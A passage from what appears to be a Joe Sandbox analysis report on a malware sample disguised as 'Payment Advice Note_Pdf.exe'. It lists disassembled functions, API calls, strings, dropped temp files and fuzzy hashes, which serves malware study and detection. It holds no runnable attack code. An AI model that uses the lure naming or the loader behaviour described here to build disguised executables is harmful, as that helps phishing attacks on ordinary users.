SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.1303817138.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1303789428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303870127.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1304115213.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 6e8d97c549c1634dd7cb3ad4fe557c39b8a0e77cc2ec0408d7783d5d6495b6da
Instruction ID: b0ee482b8836f8c5ddb0523b9b95fc6b4c0959077eeb464a3039c1fdf8a9f2d7
Opcode Fuzzy Hash: 6e8d97c549c1634dd7cb3ad4fe557c39b8a0e77cc2ec0408d7783d5d6495b6da
Instruction Fuzzy Hash: F6418B71804249AFCB058FA5DD459BFBBB9FF44310F00852AF951AA1A0C738EA51DFA5

Function 00405D4E Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 131stringmemoryCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32(00425DA8,NUL,?,00000000,?,00409300,00405EE1,?,?), ref: 00405D5D
CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00409300,00405EE1,?,?), ref: 00405D81
GetShortPathNameW.KERNEL32(?,00425DA8,00000400), ref: 00405D8A

Part of subcall function 00405B59: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E3A,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B69
Part of subcall function 00405B59: lstrlenA.KERNEL32(00000000,?,00000000,00405E3A,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B9B

GetShortPathNameW.KERNEL32(004265A8,004265A8,00000400), ref: 00405DA7
wsprintfA.USER32 ref: 00405DC5
GetFileSize.KERNEL32(00000000,00000000,004265A8,C0000000,00000004,004265A8,?,?,?,?,?), ref: 00405E00
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405E0F
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E47
SetFilePointer.KERNEL32(00409578,00000000,00000000,00000000,00000000,004259A8,00000000,-0000000A,00409578,00000000,[Rename],00000000,00000000,00000000), ref: 00405E9D
GlobalFree.KERNEL32(00000000), ref: 00405EAE
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405EB5

Part of subcall function 00405BF4: GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\Payment Advice Note_Pdf.exe,80000000,00000003,?,?,00000000,00403504,?), ref: 00405BF8
Part of subcall function 00405BF4: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,00403504,?), ref: 00405C1A

Strings

NUL, xrefs: 00405D57
%ls=%ls, xrefs: 00405DBB
[Rename], xrefs: 00405E2F, 00405E41

Memory Dump Source

Source File: 00000000.00000002.1303817138.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1303789428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303870127.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1304115213.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
String ID: %ls=%ls$NUL$[Rename]
API String ID: 222337774-899692902
Opcode ID: e80570f2f8cd2c9f135b21ee9e2312080ea8554e7c88b9adf45b38d7f754558e
Instruction ID: 907d7383bdf99192a2874dfd68d01e77647b980fe5b363d6f0c9d0989479472f
Opcode Fuzzy Hash: e80570f2f8cd2c9f135b21ee9e2312080ea8554e7c88b9adf45b38d7f754558e
Instruction Fuzzy Hash: 88311F71A05B14BBD6206B229C48F6B3A6CDF45755F14043ABE41F62D2DA3CEE018AFD

Function 004062B3 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextW.USER32(00409300,*?|<>/":,00000000,"C:\Users\user\Desktop\Payment Advice Note_Pdf.exe",763C3420,C:\Users\user\AppData\Local\Temp\,00000000,00403245,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403496), ref: 00406316
CharNextW.USER32(00409300,00409300,00409300,00000000), ref: 00406325
CharNextW.USER32(00409300,"C:\Users\user\Desktop\Payment Advice Note_Pdf.exe",763C3420,C:\Users\user\AppData\Local\Temp\,00000000,00403245,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403496), ref: 0040632A
CharPrevW.USER32(00409300,00409300,763C3420,C:\Users\user\AppData\Local\Temp\,00000000,00403245,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403496), ref: 0040633D

Strings

"C:\Users\user\Desktop\Payment Advice Note_Pdf.exe", xrefs: 004062F7
C:\Users\user\AppData\Local\Temp\, xrefs: 004062B4
*?|<>/":, xrefs: 00406305

Memory Dump Source

Source File: 00000000.00000002.1303817138.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1303789428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303870127.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1304115213.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\Payment Advice Note_Pdf.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-3829549017
Opcode ID: 6a1238fba9ba947ddf3d1c913c8afd34c4b382e8901ee0696378a8a11e3e1ee4
Instruction ID: 54bf27a4ef4c29ba7f7e7f80dc621db20ebbd613429789f6f10e18307ece98db
Opcode Fuzzy Hash: 6a1238fba9ba947ddf3d1c913c8afd34c4b382e8901ee0696378a8a11e3e1ee4
Instruction Fuzzy Hash: B711946A80021295EB313B198C40AB7B6F8EF59750F56417FED86B32C0E77C5C9286ED

Function 0040414A Relevance: 12.1, APIs: 8, Instructions: 61COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 00404167
GetSysColor.USER32(00000000), ref: 00404183
SetTextColor.GDI32(?,00000000), ref: 0040418F
SetBkMode.GDI32(?,?), ref: 0040419B
GetSysColor.USER32(?), ref: 004041AE
SetBkColor.GDI32(?,?), ref: 004041BE
DeleteObject.GDI32(?), ref: 004041D8
CreateBrushIndirect.GDI32(?), ref: 004041E2

Memory Dump Source

Source File: 00000000.00000002.1303817138.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1303789428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303870127.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1304115213.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: bdecbf54746ac4e95bafbcd3f7306951f606de83f5b9b49a03f8dc0a3bab15ec
Instruction ID: 457b5273a6ad35ed29f896ddd043663fa6b3a1b95e22c78e57b6691615e2b460
Opcode Fuzzy Hash: bdecbf54746ac4e95bafbcd3f7306951f606de83f5b9b49a03f8dc0a3bab15ec
Instruction Fuzzy Hash: 1921A1B1804704ABCB219F68DD4CB4BBBF8AF40710F048A29ED92E62E0D734E944CB65

Function 00404A48 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A63
GetMessagePos.USER32 ref: 00404A6B
ScreenToClient.USER32(?,?), ref: 00404A85
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404A97
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404ABD

Strings

f, xrefs: 00404A99

Memory Dump Source

Source File: 00000000.00000002.1303817138.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1303789428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303870127.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1304115213.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: 8f99d7edcbb1b2af9b03d3486fc4037292eab20d77c75a8c6737f0729fb79e96
Instruction ID: 42cc3fd90da340ed33e1658783c39be2c5e0210da91f3d0a8fd677c6224e58ad
Opcode Fuzzy Hash: 8f99d7edcbb1b2af9b03d3486fc4037292eab20d77c75a8c6737f0729fb79e96
Instruction Fuzzy Hash: 19015E71E40218BADB00DB94DD85FFEBBBCAF54711F10016BBB11B61D0D7B8AA058BA5

Function 00402D04 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402D22
MulDiv.KERNEL32(00084FD6,00000064,000859C8), ref: 00402D4D
wsprintfW.USER32 ref: 00402D5D
SetWindowTextW.USER32(?,?), ref: 00402D6D
SetDlgItemTextW.USER32(?,00000406,?), ref: 00402D7F

Strings

verifying installer: %d%%, xrefs: 00402D57

Memory Dump Source

Source File: 00000000.00000002.1303817138.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1303789428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303870127.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1304115213.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: a68141ec73b2a7b0005fea9bea2e0a343ee18c9164241d5958d7192c74469446
Instruction ID: 02b4a25e1ca2abb3aa07e0940f0a1006ed88c36cf357b8fab3844828eab6b7e4
Opcode Fuzzy Hash: a68141ec73b2a7b0005fea9bea2e0a343ee18c9164241d5958d7192c74469446
Instruction Fuzzy Hash: 3E01F471640209ABEF249F61DD49FEA3B69EB04305F008035FA05A92D1DBB999548F59

Function 00401D56 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 38COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401D59
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D66
MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D75
ReleaseDC.USER32(?,00000000), ref: 00401D86
CreateFontIndirectW.GDI32(0040BDD0), ref: 00401DD1

Strings

Tahoma, xrefs: 00401DB7

Memory Dump Source

Source File: 00000000.00000002.1303817138.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1303789428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303870127.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1304115213.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID: Tahoma
API String ID: 3808545654-3580928618
Opcode ID: 787a0cc1cae73e127cbf34e01b63a76a3b17128f4cf73ed1ac2ca508eda492e0
Instruction ID: f0de02ddeea559f0acc09b7c654b6cc4e6647674a776793065cdf7257ef1e696
Opcode Fuzzy Hash: 787a0cc1cae73e127cbf34e01b63a76a3b17128f4cf73ed1ac2ca508eda492e0
Instruction Fuzzy Hash: FF01A231948244BFE701ABB0AE5EBDA7F74EB65305F004479F551B62E2C77810008B6E

Function 100022D0 Relevance: 9.1, APIs: 6, Instructions: 136memoryCOMMON

Download Yara Rule

APIs

GlobalFree.KERNEL32(00000000), ref: 10002416

Part of subcall function 1000122C: lstrcpynW.KERNEL32(00000000,?,100012DF,00000019,100011BE,-000000A0), ref: 1000123C

GlobalAlloc.KERNEL32(00000040), ref: 10002397
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023B2

Memory Dump Source

Source File: 00000000.00000002.1317193990.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1317160855.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1317225994.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1317253099.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_Payment Advice Note_Pdf.jbxd

Similarity

API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
String ID:
API String ID: 4216380887-0
Opcode ID: 3b2da28fc6c9bb4151d71d136a2166c584fe2e1793c0aa67a83c17282771645f
Instruction ID: a8798eece1b67337def5fc6f06e905ed3cc6fca3e5836deafc22007a072d802d
Opcode Fuzzy Hash: 3b2da28fc6c9bb4151d71d136a2166c584fe2e1793c0aa67a83c17282771645f
Instruction Fuzzy Hash: A14190B1508305EFF320DF24D885AAA77F8FB883D0F50452DF9468619ADB34AA54DB61

Function 100024A9 Relevance: 9.1, APIs: 6, Instructions: 98COMMON

Download Yara Rule

APIs

Part of subcall function 1000121B: GlobalAlloc.KERNEL32(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225

GlobalFree.KERNEL32(?), ref: 10002572
GlobalFree.KERNEL32(00000000), ref: 100025AD

Memory Dump Source

Source File: 00000000.00000002.1317193990.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1317160855.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1317225994.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1317253099.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_Payment Advice Note_Pdf.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
Instruction ID: 76257f5bf6759f365bfcd452de7d39bb0b2322773c3eba187a8a795e141f7608
Opcode Fuzzy Hash: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
Instruction Fuzzy Hash: 6831DE71504A21EFF321CF14CCA8E2B7BF8FB853D2F114529FA40961A8CB319851DB69

Function 00402840 Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402894
GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004028B0
GlobalFree.KERNEL32(?), ref: 004028E9
GlobalFree.KERNEL32(00000000), ref: 004028FC
CloseHandle.KERNEL32(?), ref: 00402914
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402928

Memory Dump Source

Source File: 00000000.00000002.1303817138.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1303789428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303870127.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1304115213.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: 87880a874489fc218ffeed1bb5b7a61d92979f204a9b9b6f840c636aa4f91737
Instruction ID: ec7c0e824f3835a9a78c8c015c1ffbc75d15747d838d6b82ce361eed526a9b83
Opcode Fuzzy Hash: 87880a874489fc218ffeed1bb5b7a61d92979f204a9b9b6f840c636aa4f91737
Instruction Fuzzy Hash: 1B219E72C00118BBCF216FA5CD49D9E7E79EF09324F24027AF520762E1C7796D419BA9

Function 00402537 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 67stringCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nseEFF9.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nseEFF9.tmp\System.dll,00000400,?,?,00000021), ref: 00402583
lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nseEFF9.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nseEFF9.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nseEFF9.tmp\System.dll,00000400,?,?,00000021), ref: 0040258E

Strings

C:\Users\user\AppData\Local\Temp\nseEFF9.tmp\System.dll, xrefs: 00402552, 00402575, 00402589, 004025D5
C:\Users\user\AppData\Local\Temp\nseEFF9.tmp, xrefs: 0040257C

Memory Dump Source

Source File: 00000000.00000002.1303817138.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1303789428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303870127.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1304115213.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID: ByteCharMultiWidelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nseEFF9.tmp$C:\Users\user\AppData\Local\Temp\nseEFF9.tmp\System.dll
API String ID: 3109718747-3822760573
Opcode ID: a832b171f12e8f15ab2a7734aa6877a9a8c040e81bc2b2a7d2ca0c778b2d5240
Instruction ID: bfa6d714be92c4527cef4f8895cb5ef110114927b7979418da5827123998f54c
Opcode Fuzzy Hash: a832b171f12e8f15ab2a7734aa6877a9a8c040e81bc2b2a7d2ca0c778b2d5240
Instruction Fuzzy Hash: AE110A72A41204BEDB10AFB58F4AE9E3669AF54394F20403BF402F61C2D6FC8E41466D

Function 00402BFF Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402C20
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402C5C
RegCloseKey.ADVAPI32(?), ref: 00402C65
RegCloseKey.ADVAPI32(?), ref: 00402C8A
RegDeleteKeyW.ADVAPI32(?,?), ref: 00402CA8

Memory Dump Source

Source File: 00000000.00000002.1303817138.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1303789428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303870127.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1304115213.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: 6121e8ff7f107a9e0c5c71db51fa80124b77cb8196dbe3be819c2b517f5432bf
Instruction ID: 783455ef39ba97bad4d92773a6bd33e03ba47aaf13af7a3f43d32fd345691cd1
Opcode Fuzzy Hash: 6121e8ff7f107a9e0c5c71db51fa80124b77cb8196dbe3be819c2b517f5432bf
Instruction Fuzzy Hash: 52115971908118FEEF119F90DE8CEAE3B79FB14384F100476FA05A10A0D3B49E52AA69

Function 100015FF Relevance: 7.5, APIs: 5, Instructions: 41memorylibraryloaderCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002148,?,00000808), ref: 10001617
GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,10002148,?,00000808), ref: 1000161E
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002148,?,00000808), ref: 10001632
GetProcAddress.KERNEL32(10002148,00000000), ref: 10001639
GlobalFree.KERNEL32(00000000), ref: 10001642

Memory Dump Source

Source File: 00000000.00000002.1317193990.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1317160855.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1317225994.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1317253099.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_Payment Advice Note_Pdf.jbxd

Similarity

API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
String ID:
API String ID: 1148316912-0
Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1

Function 00401CFA Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00401D00
GetClientRect.USER32(00000000,?), ref: 00401D0D
LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D2E
SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D3C
DeleteObject.GDI32(00000000), ref: 00401D4B

Memory Dump Source

Source File: 00000000.00000002.1303817138.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1303789428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303870127.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
